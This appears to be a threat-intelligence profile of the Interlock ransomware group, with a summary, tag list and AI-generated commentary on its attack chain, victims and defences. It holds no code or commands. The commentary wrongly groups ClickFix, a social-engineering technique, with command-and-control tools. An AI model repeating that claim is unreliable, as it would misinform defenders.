Threat Actor Profile: Interlock Ransomware

SUMMARY :

Interlock, a relatively new ransomware group first observed in September 2024, has gained prominence in 2025 as an opportunistic ransomware operator. Unlike traditional Ransomware-as-a-Service models, Interlock operates without affiliates or public advertisements. The group conducts double extortion campaigns, leveraging compromised websites and multi-stage social engineering techniques to deliver payloads. Interlock's attack chain involves initial access through fake software updaters, execution of PowerShell scripts, and the use of custom remote access trojans. The group has targeted various sectors across North America and Europe, including education, healthcare, technology, and government entities. Notable attacks include the DaVita breach in April 2025 and the ransomware attack on the city of St. Paul, Minnesota in July 2025.

OPENCTI LABELS :

cobalt strike,powershell,social engineering,ransomware,remote access trojan,systembc,clickfix,double extortion,trycloudflare,compromised websites,interlock rat,nodesnake rat


AI COMMENTARY :

1. Threat Actor Profile: Interlock Ransomware draws attention as a newly emerged group since September 2024 that has quickly become a prominent opportunistic ransomware operator in 2025. Unlike conventional RaaS operations that rely on affiliates and public ads, Interlock maintains a lean structure, handling every stage of an attack internally.

2. Emergence and Operational Model: Interlock's distinctive approach bypasses affiliate networks and resists outsourcing, relying on customized tools such as Interlock RAT and NodeSnake RAT. The group specializes in double extortion schemes, first encrypting data and then threatening to publish stolen information if victims refuse to pay. Its marketing is clandestine, with no advertisements in underground forums, increasing the difficulty for defenders to understand its full reach.

3. Attack Chain and Techniques: The initial compromise often begins with multi-stage social engineering campaigns. Victims receive fake software updaters that deploy PowerShell scripts designed to fetch additional payloads. Once inside the network, Interlock uses bespoke remote access trojans and third-party frameworks like Cobalt Strike for lateral movement. Tools such as SystemBC, ClickFix, and TryCloudflare facilitate covert command and control communication, while compromised websites serve as drop points for malicious installers and scripts.

4. Targets and Impact: Interlock's victims span education, healthcare, technology, and government in North America and Europe. High-profile incidents include the April 2025 DaVita breach, where patient records were stolen before encryption, and the July 2025 attack on the city of St. Paul, Minnesota, which disrupted municipal services. Each of these double extortion cases demonstrates Interlock's willingness to exploit critical infrastructure and sensitive data for maximum leverage.

5. Defensive Considerations and Threat Intelligence: Organizations can strengthen their defenses by monitoring for indicators of compromise such as unusual PowerShell activity and unexpected Cobalt Strike beacons. Threat intelligence professionals should track known Interlock RAT command servers and analyze phishing URLs hosted on compromised websites. Adoption of layered security controls, network segmentation, and robust incident response plans can reduce exposure to double extortion scenarios.

6. Conclusion and Outlook: As Interlock continues to refine its toolset and expand its scope without relying on affiliates, it underscores the evolution of ransomware tactics toward smaller, specialized teams. Continuous threat intelligence gathering, proactive hunting for signs of infection, and timely patch management remain critical to countering this emerging threat actor.




OPEN NETMANAGEIT OPENCTI REPORT LINK!


Use public read only username and password on login page.

NOTE : Use Public READ only user credentials on login page banner.


Threat Actor Profile: Interlock Ransomware